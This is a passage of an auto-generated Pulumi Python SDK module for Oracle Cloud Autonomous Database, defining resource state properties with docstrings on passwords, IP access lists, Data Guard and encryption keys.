It is applicable only when `is_data_guard_enabled` is true. Could be set to `PRIMARY` or `STANDBY`. Default value is `PRIMARY`.
"""
return pulumi.get(self, "switchover_to")
@switchover_to.setter
def switchover_to(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "switchover_to", value)
@property
@pulumi.getter
def timestamp(self) -> Optional[pulumi.Input[str]]:
"""
The timestamp specified for the point-in-time clone of the source Autonomous Database. The timestamp must be in the past.
"""
return pulumi.get(self, "timestamp")
@timestamp.setter
def timestamp(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "timestamp", value)
@property
@pulumi.getter(name="vaultId")
def vault_id(self) -> Optional[pulumi.Input[str]]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the Oracle Cloud Infrastructure [vault](https://docs.cloud.oracle.com/iaas/Content/KeyManagement/Concepts/keyoverview.htm#concepts).
"""
return pulumi.get(self, "vault_id")
@vault_id.setter
def vault_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "vault_id", value)
@property
@pulumi.getter(name="whitelistedIps")
def whitelisted_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
(Updatable) The client IP access control list (ACL). This feature is available for autonomous databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI) and on Exadata Cloud@Customer. Only clients connecting from an IP address included in the ACL may access the Autonomous Database instance.
"""
return pulumi.get(self, "whitelisted_ips")
@whitelisted_ips.setter
def whitelisted_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "whitelisted_ips", value)
@pulumi.input_type
class _AutonomousDatabaseState:
def __init__(__self__, *,
admin_password: Optional[pulumi.Input[str]] = None,
apex_details: Optional[pulumi.Input['AutonomousDatabaseApexDetailsArgs']] = None,
are_primary_whitelisted_ips_used: Optional[pulumi.Input[bool]] = None,
autonomous_container_database_id: Optional[pulumi.Input[str]] = None,
autonomous_database_backup_id: Optional[pulumi.Input[str]] = None,
autonomous_database_id: Optional[pulumi.Input[str]] = None,
autonomous_maintenance_schedule_type: Optional[pulumi.Input[str]] = None,
available_upgrade_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
backup_config: Optional[pulumi.Input['AutonomousDatabaseBackupConfigArgs']] = None,
clone_type: Optional[pulumi.Input[str]] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
connection_strings: Optional[pulumi.Input['AutonomousDatabaseConnectionStringsArgs']] = None,
connection_urls: Optional[pulumi.Input['AutonomousDatabaseConnectionUrlsArgs']] = None,
cpu_core_count: Optional[pulumi.Input[int]] = None,
customer_contacts: Optional[pulumi.Input[Sequence[pulumi.Input['AutonomousDatabaseCustomerContactArgs']]]] = None,
data_safe_status: Optional[pulumi.Input[str]] = None,
data_storage_size_in_gb: Optional[pulumi.Input[int]] = None,
data_storage_size_in_tbs: Optional[pulumi.Input[int]] = None,
db_name: Optional[pulumi.Input[str]] = None,
db_version: Optional[pulumi.Input[str]] = None,
db_workload: Optional[pulumi.Input[str]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
failed_data_recovery_in_seconds: Optional[pulumi.Input[int]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
infrastructure_type: Optional[pulumi.Input[str]] = None,
is_access_control_enabled: Optional[pulumi.Input[bool]] = None,
is_auto_scaling_enabled: Optional[pulumi.Input[bool]] = None,
is_data_guard_enabled: Optional[pulumi.Input[bool]] = None,
is_dedicated: Optional[pulumi.Input[bool]] = None,
is_free_tier: Optional[pulumi.Input[bool]] = None,
is_preview: Optional[pulumi.Input[bool]] = None,
is_preview_version_with_service_terms_accepted: Optional[pulumi.Input[bool]] = None,
is_refreshable_clone: Optional[pulumi.Input[bool]] = None,
key_history_entries: Optional[pulumi.Input[Sequence[pulumi.Input['AutonomousDatabaseKeyHistoryEntryArgs']]]] = None,
key_store_id: Optional[pulumi.Input[str]] = None,
key_store_wallet_name: Optional[pulumi.Input[str]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
kms_key_lifecycle_details: Optional[pulumi.Input[str]] = None,
license_model: Optional[pulumi.Input[str]] = None,
lifecycle_details: Optional[pulumi.Input[str]] = None,
nsg_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
ocpu_count: Optional[pulumi.Input[float]] = None,
open_mode: Optional[pulumi.Input[str]] = None,
operations_insights_status: Optional[pulumi.Input[str]] = None,
permission_level: Optional[pulumi.Input[str]] = None,
private_endpoint: Optional[pulumi.Input[str]] = None,
private_endpoint_ip: Optional[pulumi.Input[str]] = None,
private_endpoint_label: Optional[pulumi.Input[str]] = None,
refreshable_mode: Optional[pulumi.Input[str]] = None,
refreshable_status: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None,
rotate_key_trigger: Optional[pulumi.Input[bool]] = None,
service_console_url: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[str]] = None,
source_id: Optional[pulumi.Input[str]] = None,
standby_db: Optional[pulumi.Input['AutonomousDatabaseStandbyDbArgs']] = None,
standby_whitelisted_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
state: Optional[pulumi.Input[str]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
switchover_to: Optional[pulumi.Input[str]] = None,
system_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
time_created: Optional[pulumi.Input[str]] = None,
time_deletion_of_free_autonomous_database: Optional[pulumi.Input[str]] = None,
time_maintenance_begin: Optional[pulumi.Input[str]] = None,
time_maintenance_end: Optional[pulumi.Input[str]] = None,
time_of_last_failover: Optional[pulumi.Input[str]] = None,
time_of_last_refresh: Optional[pulumi.Input[str]] = None,
time_of_last_refresh_point: Optional[pulumi.Input[str]] = None,
time_of_last_switchover: Optional[pulumi.Input[str]] = None,
time_of_next_refresh: Optional[pulumi.Input[str]] = None,
time_reclamation_of_free_autonomous_database: Optional[pulumi.Input[str]] = None,
timestamp: Optional[pulumi.Input[str]] = None,
used_data_storage_size_in_tbs: Optional[pulumi.Input[int]] = None,
vault_id: Optional[pulumi.Input[str]] = None,
whitelisted_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering AutonomousDatabase resources.
:param pulumi.Input[str] admin_password: (Updatable) The password must be between 12 and 30 characters long, and must contain at least 1 uppercase, 1 lowercase, and 1 numeric character. It cannot contain the double quote symbol (") or the username "admin", regardless of casing. The password is mandatory if source value is "BACKUP_FROM_ID", "BACKUP_FROM_TIMESTAMP", "DATABASE" or "NONE".
:param pulumi.Input['AutonomousDatabaseApexDetailsArgs'] apex_details: Information about Oracle APEX Application Development.
:param pulumi.Input[bool] are_primary_whitelisted_ips_used: (Updatable) This field will be null if the Autonomous Database is not Data Guard enabled or Access Control is disabled. It's value would be `TRUE` if Autonomous Database is Data Guard enabled and Access Control is enabled and if the Autonomous Database uses primary IP access control list (ACL) for standby. It's value would be `FALSE` if Autonomous Database is Data Guard enabled and Access Control is enabled and if the Autonomous Database uses different IP access control list (ACL) for standby compared to primary.
:param pulumi.Input[str] autonomous_container_database_id: The Autonomous Container Database [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm).
:param pulumi.Input[str] autonomous_database_backup_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database Backup that you will clone to create a new Autonomous Database.
:param pulumi.Input[str] autonomous_database_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database that you will clone to create a new Autonomous Database.
:param pulumi.Input[str] autonomous_maintenance_schedule_type: The maintenance schedule type of the Autonomous Database on shared Exadata infrastructure. The EARLY maintenance schedule of this Autonomous Database follows a schedule that applies patches prior to the REGULAR schedule.The REGULAR maintenance schedule of this Autonomous Database follows the normal cycle.
:param pulumi.Input[Sequence[pulumi.Input[str]]] available_upgrade_versions: List of Oracle Database versions available for a database upgrade. If there are no version upgrades available, this list is empty.
:param pulumi.Input['AutonomousDatabaseBackupConfigArgs'] backup_config: Autonomous Database configuration details for storing [manual backups](https://docs.cloud.oracle.com/iaas/Content/Database/Tasks/adbbackingup.htm) in the [Object Storage](https://docs.cloud.oracle.com/iaas/Content/Object/Concepts/objectstorageoverview.htm) service.
:param pulumi.Input[str] clone_type: The Autonomous Database clone type.
:param pulumi.Input[str] compartment_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment of the Autonomous Database.
:param pulumi.Input['AutonomousDatabaseConnectionStringsArgs'] connection_strings: The connection string used to connect to the Autonomous Database. The username for the Service Console is ADMIN. Use the password you entered when creating the Autonomous Database for the password value.
:param pulumi.Input['AutonomousDatabaseConnectionUrlsArgs'] connection_urls: The URLs for accessing Oracle Application Express (APEX) and SQL Developer Web with a browser from a Compute instance within your VCN or that has a direct connection to your VCN. Note that these URLs are provided by the console only for databases on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm). Example: `{"sqlDevWebUrl": "https://<hostname>/ords...", "apexUrl", "https://<hostname>/ords..."}`
:param pulumi.Input[int] cpu_core_count: (Updatable) The number of OCPU cores to be made available to the database. For Autonomous Databases on dedicated Exadata infrastructure, the maximum number of cores is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
:param pulumi.Input[Sequence[pulumi.Input['AutonomousDatabaseCustomerContactArgs']]] customer_contacts: (Updatable) Customer Contacts.
:param pulumi.Input[str] data_safe_status: (Updatable) Status of the Data Safe registration for this Autonomous Database. Could be REGISTERED or NOT_REGISTERED.
:param pulumi.Input[int] data_storage_size_in_gb: (Updatable) The size, in gigabytes, of the data volume that will be created and attached to the database. This storage can later be scaled up if needed. The maximum storage value is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
:param pulumi.Input[int] data_storage_size_in_tbs: (Updatable) The size, in terabytes, of the data volume that will be created and attached to the database. This storage can later be scaled up if needed. For Autonomous Databases on dedicated Exadata infrastructure, the maximum storage value is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
:param pulumi.Input[str] db_name: The database name. The name must begin with an alphabetic character and can contain a maximum of 14 alphanumeric characters. Special characters are not permitted. The database name must be unique in the tenancy.
:param pulumi.Input[str] db_version: (Updatable) A valid Oracle Database version for Autonomous Database.`db_workload` AJD and APEX are only supported for `db_version` `19c` and above.
:param pulumi.Input[str] db_workload: (Updatable) The Autonomous Database workload type. The following values are valid:
* OLTP - indicates an Autonomous Transaction Processing database
* DW - indicates an Autonomous Data Warehouse database
* AJD - indicates an Autonomous JSON Database
* APEX - indicates an Autonomous Database with the Oracle APEX Application Development workload type. *Note: `db_workload` can only be updated from AJD to OLTP or from a free OLTP to AJD.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
:param pulumi.Input[str] display_name: (Updatable) The user-friendly name for the Autonomous Database. The name does not have to be unique.
:param pulumi.Input[int] failed_data_recovery_in_seconds: Indicates the number of seconds of data loss for a Data Guard failover.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
:param pulumi.Input[str] infrastructure_type: The infrastructure type this resource belongs to.
:param pulumi.Input[bool] is_access_control_enabled: (Updatable) Indicates if the database-level access control is enabled. If disabled, database access is defined by the network security rules. If enabled, database access is restricted to the IP addresses defined by the rules specified with the `whitelistedIps` property. While specifying `whitelistedIps` rules is optional, if database-level access control is enabled and no rules are specified, the database will become inaccessible. The rules can be added later using the `UpdateAutonomousDatabase` API operation or edit option in console. When creating a database clone, the desired access control setting should be specified. By default, database-level access control will be disabled for the clone.
:param pulumi.Input[bool] is_auto_scaling_enabled: (Updatable) Indicates if auto scaling is enabled for the Autonomous Database OCPU core count. The default value is `FALSE`.
:param pulumi.Input[bool] is_data_guard_enabled: (Updatable) Indicates whether the Autonomous Database has Data Guard enabled.
:param pulumi.Input[bool] is_dedicated: True if the database is on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm).
:param pulumi.Input[bool] is_free_tier: (Updatable) Indicates if this is an Always Free resource. The default value is false. Note that Always Free Autonomous Databases have 1 CPU and 20GB of memory. For Always Free databases, memory and CPU cannot be scaled. When `db_workload` is `AJD` or `APEX` it cannot be `true`.
:param pulumi.Input[bool] is_preview: Indicates if the Autonomous Database version is a preview version.
:param pulumi.Input[bool] is_preview_version_with_service_terms_accepted: If set to `TRUE`, indicates that an Autonomous Database preview version is being provisioned, and that the preview version's terms of service have been accepted. Note that preview version software is only available for databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI).
:param pulumi.Input[bool] is_refreshable_clone: (Updatable) True for creating a refreshable clone and False for detaching the clone from source Autonomous Database. Detaching is one time operation and clone becomes a regular Autonomous Database.
:param pulumi.Input[Sequence[pulumi.Input['AutonomousDatabaseKeyHistoryEntryArgs']]] key_history_entries: Key History Entry.
:param pulumi.Input[str] key_store_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the key store.
:param pulumi.Input[str] key_store_wallet_name: The wallet name for Oracle Key Vault.
:param pulumi.Input[str] kms_key_id: The OCID of the key container that is used as the master encryption key in database transparent data encryption (TDE) operations.
:param pulumi.Input[str] kms_key_lifecycle_details: KMS key lifecycle details.
:param pulumi.Input[str] license_model: (Updatable) The Oracle license model that applies to the Oracle Autonomous Database. Bring your own license (BYOL) allows you to apply your current on-premises Oracle software licenses to equivalent, highly automated Oracle PaaS and IaaS services in the cloud. License Included allows you to subscribe to new Oracle Database software licenses and the Database service. Note that when provisioning an Autonomous Database on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm), this attribute must be null because the attribute is already set at the Autonomous Exadata Infrastructure level. When using [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI), if a value is not specified, the system will supply the value of `BRING_YOUR_OWN_LICENSE`. It is a required field when `db_workload` is AJD and needs to be set to `LICENSE_INCLUDED` as AJD does not support default `license_model` value `BRING_YOUR_OWN_LICENSE`.
:param pulumi.Input[str] lifecycle_details: Additional information about the current lifecycle state.
:param pulumi.Input[Sequence[pulumi.Input[str]]] nsg_ids: (Updatable) A list of the [OCIDs](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the network security groups (NSGs) that this resource belongs to. Setting this to an empty array after the list is created removes the resource from all NSGs. For more information about NSGs, see [Security Rules](https://docs.cloud.oracle.com/iaas/Content/Network/Concepts/securityrules.htm). **NsgIds restrictions:**
* Autonomous Databases with private access require at least 1 Network Security Group (NSG). The nsgIds array cannot be empty.
:param pulumi.Input[float] ocpu_count: (Updatable) The number of OCPU cores to be made available to the database.
:param pulumi.Input[str] open_mode: The `DATABASE OPEN` mode. You can open the database in `READ_ONLY` or `READ_WRITE` mode.
:param pulumi.Input[str] operations_insights_status: Status of Operations Insights for this Autonomous Database.
:param pulumi.Input[str] permission_level: The Autonomous Database permission level. Restricted mode allows access only to admin users.
:param pulumi.Input[str] private_endpoint: The private endpoint for the resource.
:param pulumi.Input[str] private_endpoint_ip: The private endpoint Ip address for the resource.
:param pulumi.Input[str] private_endpoint_label: (Updatable) The private endpoint label for the resource.
:param pulumi.Input[str] refreshable_mode: (Updatable) The refresh mode of the clone. AUTOMATIC indicates that the clone is automatically being refreshed with data from the source Autonomous Database.
:param pulumi.Input[str] refreshable_status: The refresh status of the clone. REFRESHING indicates that the clone is currently being refreshed with data from the source Autonomous Database.
:param pulumi.Input[str] role: The Data Guard role of the Autonomous Container Database, if Autonomous Data Guard is enabled.
:param pulumi.Input[bool] rotate_key_trigger: (Updatable) An optional property when flipped triggers rotation of KMS key. It is only applicable on dedicated databases i.e. where `is_dedicated` is true.
:param pulumi.Input[str] service_console_url: The URL of the Service Console for the Autonomous Database.
:param pulumi.Input[str] source: The source of the database: Use `NONE` for creating a new Autonomous Database. Use `DATABASE` for creating a new Autonomous Database by cloning an existing Autonomous Database.
:param pulumi.Input[str] source_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database that you will clone to create a new Autonomous Database.
:param pulumi.Input['AutonomousDatabaseStandbyDbArgs'] standby_db: Autonomous Data Guard standby database details.
:param pulumi.Input[Sequence[pulumi.Input[str]]] standby_whitelisted_ips: (Updatable) The client IP access control list (ACL). This feature is available for autonomous databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI) and on Exadata Cloud@Customer. Only clients connecting from an IP address included in the ACL may access the Autonomous Database instance.
:param pulumi.Input[str] state: (Updatable) The current state of the Autonomous Database. Could be set to AVAILABLE or STOPPED
:param pulumi.Input[str] subnet_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the subnet the resource is associated with.
:param pulumi.Input[str] switchover_to: It is applicable only when `is_data_guard_enabled` is true. Could be set to `PRIMARY` or `STANDBY`. Default value is `PRIMARY`.
:param pulumi.Input[Mapping[str, Any]] system_tags: System tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
:param pulumi.Input[str] time_created: The date and time the Autonomous Database was created.
:param pulumi.Input[str] time_deletion_of_free_autonomous_database: The date and time the Always Free database will be automatically deleted because of inactivity. If the database is in the STOPPED state and without activity until this time, it will be deleted.
:param pulumi.Input[str] time_maintenance_begin: The date and time when maintenance will begin.
:param pulumi.Input[str] time_maintenance_end: The date and time when maintenance will end.
:param pulumi.Input[str] time_of_last_failover: The timestamp of the last failover operation.
:param pulumi.Input[str] time_of_last_refresh: The date and time when last refresh happened.
:param pulumi.Input[str] time_of_last_refresh_point: The refresh point timestamp (UTC). The refresh point is the time to which the database was most recently refreshed. Data created after the refresh point is not included in the refresh.
:param pulumi.Input[str] time_of_last_switchover: The timestamp of the last switchover operation for the Autonomous Database.
:param pulumi.Input[str] time_of_next_refresh: The date and time of next refresh.
:param pulumi.Input[str] time_reclamation_of_free_autonomous_database: The date and time the Always Free database will be stopped because of inactivity. If this time is reached without any database activity, the database will automatically be put into the STOPPED state.
:param pulumi.Input[str] timestamp: The timestamp specified for the point-in-time clone of the source Autonomous Database. The timestamp must be in the past.
:param pulumi.Input[int] used_data_storage_size_in_tbs: The amount of storage that has been used, in terabytes.
:param pulumi.Input[str] vault_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the Oracle Cloud Infrastructure [vault](https://docs.cloud.oracle.com/iaas/Content/KeyManagement/Concepts/keyoverview.htm#concepts).
:param pulumi.Input[Sequence[pulumi.Input[str]]] whitelisted_ips: (Updatable) The client IP access control list (ACL). This feature is available for autonomous databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI) and on Exadata Cloud@Customer. Only clients connecting from an IP address included in the ACL may access the Autonomous Database instance.
"""
if admin_password is not None:
pulumi.set(__self__, "admin_password", admin_password)
if apex_details is not None:
pulumi.set(__self__, "apex_details", apex_details)
if are_primary_whitelisted_ips_used is not None:
pulumi.set(__self__, "are_primary_whitelisted_ips_used", are_primary_whitelisted_ips_used)
if autonomous_container_database_id is not None:
pulumi.set(__self__, "autonomous_container_database_id", autonomous_container_database_id)
if autonomous_database_backup_id is not None:
pulumi.set(__self__, "autonomous_database_backup_id", autonomous_database_backup_id)
if autonomous_database_id is not None:
pulumi.set(__self__, "autonomous_database_id", autonomous_database_id)
if autonomous_maintenance_schedule_type is not None:
pulumi.set(__self__, "autonomous_maintenance_schedule_type", autonomous_maintenance_schedule_type)
if available_upgrade_versions is not None:
pulumi.set(__self__, "available_upgrade_versions", available_upgrade_versions)
if backup_config is not None:
pulumi.set(__self__, "backup_config", backup_config)
if clone_type is not None:
pulumi.set(__self__, "clone_type", clone_type)
if compartment_id is not None:
pulumi.set(__self__, "compartment_id", compartment_id)
if connection_strings is not None:
pulumi.set(__self__, "connection_strings", connection_strings)
if connection_urls is not None:
pulumi.set(__self__, "connection_urls", connection_urls)
if cpu_core_count is not None:
pulumi.set(__self__, "cpu_core_count", cpu_core_count)
if customer_contacts is not None:
pulumi.set(__self__, "customer_contacts", customer_contacts)
if data_safe_status is not None:
pulumi.set(__self__, "data_safe_status", data_safe_status)
if data_storage_size_in_gb is not None:
pulumi.set(__self__, "data_storage_size_in_gb", data_storage_size_in_gb)
if data_storage_size_in_tbs is not None:
pulumi.set(__self__, "data_storage_size_in_tbs", data_storage_size_in_tbs)
if db_name is not None:
pulumi.set(__self__, "db_name", db_name)
if db_version is not None:
pulumi.set(__self__, "db_version", db_version)
if db_workload is not None:
pulumi.set(__self__, "db_workload", db_workload)
if defined_tags is not None:
pulumi.set(__self__, "defined_tags", defined_tags)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if failed_data_recovery_in_seconds is not None:
pulumi.set(__self__, "failed_data_recovery_in_seconds", failed_data_recovery_in_seconds)
if freeform_tags is not None:
pulumi.set(__self__, "freeform_tags", freeform_tags)
if infrastructure_type is not None:
pulumi.set(__self__, "infrastructure_type", infrastructure_type)
if is_access_control_enabled is not None:
pulumi.set(__self__, "is_access_control_enabled", is_access_control_enabled)
if is_auto_scaling_enabled is not None:
pulumi.set(__self__, "is_auto_scaling_enabled", is_auto_scaling_enabled)
if is_data_guard_enabled is not None:
pulumi.set(__self__, "is_data_guard_enabled", is_data_guard_enabled)
if is_dedicated is not None:
pulumi.set(__self__, "is_dedicated", is_dedicated)
if is_free_tier is not None:
pulumi.set(__self__, "is_free_tier", is_free_tier)
if is_preview is not None:
pulumi.set(__self__, "is_preview", is_preview)
if is_preview_version_with_service_terms_accepted is not None:
pulumi.set(__self__, "is_preview_version_with_service_terms_accepted", is_preview_version_with_service_terms_accepted)
if is_refreshable_clone is not None:
pulumi.set(__self__, "is_refreshable_clone", is_refreshable_clone)
if key_history_entries is not None:
pulumi.set(__self__, "key_history_entries", key_history_entries)
if key_store_id is not None:
pulumi.set(__self__, "key_store_id", key_store_id)
if key_store_wallet_name is not None:
pulumi.set(__self__, "key_store_wallet_name", key_store_wallet_name)
if kms_key_id is not None:
pulumi.set(__self__, "kms_key_id", kms_key_id)
if kms_key_lifecycle_details is not None:
pulumi.set(__self__, "kms_key_lifecycle_details", kms_key_lifecycle_details)
if license_model is not None:
pulumi.set(__self__, "license_model", license_model)
if lifecycle_details is not None:
pulumi.set(__self__, "lifecycle_details", lifecycle_details)
if nsg_ids is not None:
pulumi.set(__self__, "nsg_ids", nsg_ids)
if ocpu_count is not None:
pulumi.set(__self__, "ocpu_count", ocpu_count)
if open_mode is not None:
pulumi.set(__self__, "open_mode", open_mode)
if operations_insights_status is not None:
pulumi.set(__self__, "operations_insights_status", operations_insights_status)
if permission_level is not None:
pulumi.set(__self__, "permission_level", permission_level)
if private_endpoint is not None:
pulumi.set(__self__, "private_endpoint", private_endpoint)
if private_endpoint_ip is not None:
pulumi.set(__self__, "private_endpoint_ip", private_endpoint_ip)
if private_endpoint_label is not None:
pulumi.set(__self__, "private_endpoint_label", private_endpoint_label)
if refreshable_mode is not None:
pulumi.set(__self__, "refreshable_mode", refreshable_mode)
if refreshable_status is not None:
pulumi.set(__self__, "refreshable_status", refreshable_status)
if role is not None:
pulumi.set(__self__, "role", role)
if rotate_key_trigger is not None:
pulumi.set(__self__, "rotate_key_trigger", rotate_key_trigger)
if service_console_url is not None:
pulumi.set(__self__, "service_console_url", service_console_url)
if source is not None:
pulumi.set(__self__, "source", source)
if source_id is not None:
pulumi.set(__self__, "source_id", source_id)
if standby_db is not None:
pulumi.set(__self__, "standby_db", standby_db)
if standby_whitelisted_ips is not None:
pulumi.set(__self__, "standby_whitelisted_ips", standby_whitelisted_ips)
if state is not None:
pulumi.set(__self__, "state", state)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if switchover_to is not None:
pulumi.set(__self__, "switchover_to", switchover_to)
if system_tags is not None:
pulumi.set(__self__, "system_tags", system_tags)
if time_created is not None:
pulumi.set(__self__, "time_created", time_created)
if time_deletion_of_free_autonomous_database is not None:
pulumi.set(__self__, "time_deletion_of_free_autonomous_database", time_deletion_of_free_autonomous_database)
if time_maintenance_begin is not None:
pulumi.set(__self__, "time_maintenance_begin", time_maintenance_begin)
if time_maintenance_end is not None:
pulumi.set(__self__, "time_maintenance_end", time_maintenance_end)
if time_of_last_failover is not None:
pulumi.set(__self__, "time_of_last_failover", time_of_last_failover)
if time_of_last_refresh is not None:
pulumi.set(__self__, "time_of_last_refresh", time_of_last_refresh)
if time_of_last_refresh_point is not None:
pulumi.set(__self__, "time_of_last_refresh_point", time_of_last_refresh_point)
if time_of_last_switchover is not None:
pulumi.set(__self__, "time_of_last_switchover", time_of_last_switchover)
if time_of_next_refresh is not None:
pulumi.set(__self__, "time_of_next_refresh", time_of_next_refresh)
if time_reclamation_of_free_autonomous_database is not None:
pulumi.set(__self__, "time_reclamation_of_free_autonomous_database", time_reclamation_of_free_autonomous_database)
if timestamp is not None:
pulumi.set(__self__, "timestamp", timestamp)
if used_data_storage_size_in_tbs is not None:
pulumi.set(__self__, "used_data_storage_size_in_tbs", used_data_storage_size_in_tbs)
if vault_id is not None:
pulumi.set(__self__, "vault_id", vault_id)
if whitelisted_ips is not None:
pulumi.set(__self__, "whitelisted_ips", whitelisted_ips)
@property
@pulumi.getter(name="adminPassword")
def admin_password(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The password must be between 12 and 30 characters long, and must contain at least 1 uppercase, 1 lowercase, and 1 numeric character. It cannot contain the double quote symbol (") or the username "admin", regardless of casing. The password is mandatory if source value is "BACKUP_FROM_ID", "BACKUP_FROM_TIMESTAMP", "DATABASE" or "NONE".
"""
return pulumi.get(self, "admin_password")
@admin_password.setter
def admin_password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "admin_password", value)
@property
@pulumi.getter(name="apexDetails")
def apex_details(self) -> Optional[pulumi.Input['AutonomousDatabaseApexDetailsArgs']]:
"""
Information about Oracle APEX Application Development.
"""
return pulumi.get(self, "apex_details")
@apex_details.setter
def apex_details(self, value: Optional[pulumi.Input['AutonomousDatabaseApexDetailsArgs']]):
pulumi.set(self, "apex_details", value)
@property
@pulumi.getter(name="arePrimaryWhitelistedIpsUsed")
def are_primary_whitelisted_ips_used(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) This field will be null if the Autonomous Database is not Data Guard enabled or Access Control is disabled. It's value would be `TRUE` if Autonomous Database is Data Guard enabled and Access Control is enabled and if the Autonomous Database uses primary IP access control list (ACL) for standby. It's value would be `FALSE` if Autonomous Database is Data Guard enabled and Access Control is enabled and if the Autonomous Database uses different IP access control list (ACL) for standby compared to primary.
"""
return pulumi.get(self, "are_primary_whitelisted_ips_used")
@are_primary_whitelisted_ips_used.setter
def are_primary_whitelisted_ips_used(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "are_primary_whitelisted_ips_used", value)
@property
@pulumi.getter(name="autonomousContainerDatabaseId")
def autonomous_container_database_id(self) -> Optional[pulumi.Input[str]]:
"""
The Autonomous Container Database [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm).
"""
return pulumi.get(self, "autonomous_container_database_id")
@autonomous_container_database_id.setter
def autonomous_container_database_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "autonomous_container_database_id", value)
@property
@pulumi.getter(name="autonomousDatabaseBackupId")
def autonomous_database_backup_id(self) -> Optional[pulumi.Input[str]]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database Backup that you will clone to create a new Autonomous Database.
"""
return pulumi.get(self, "autonomous_database_backup_id")
@autonomous_database_backup_id.setter
def autonomous_database_backup_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "autonomous_database_backup_id", value)
@property
@pulumi.getter(name="autonomousDatabaseId")
def autonomous_database_id(self) -> Optional[pulumi.Input[str]]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database that you will clone to create a new Autonomous Database.
"""
return pulumi.get(self, "autonomous_database_id")
@autonomous_database_id.setter
def autonomous_database_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "autonomous_database_id", value)
@property
@pulumi.getter(name="autonomousMaintenanceScheduleType")
def autonomous_maintenance_schedule_type(self) -> Optional[pulumi.Input[str]]:
"""
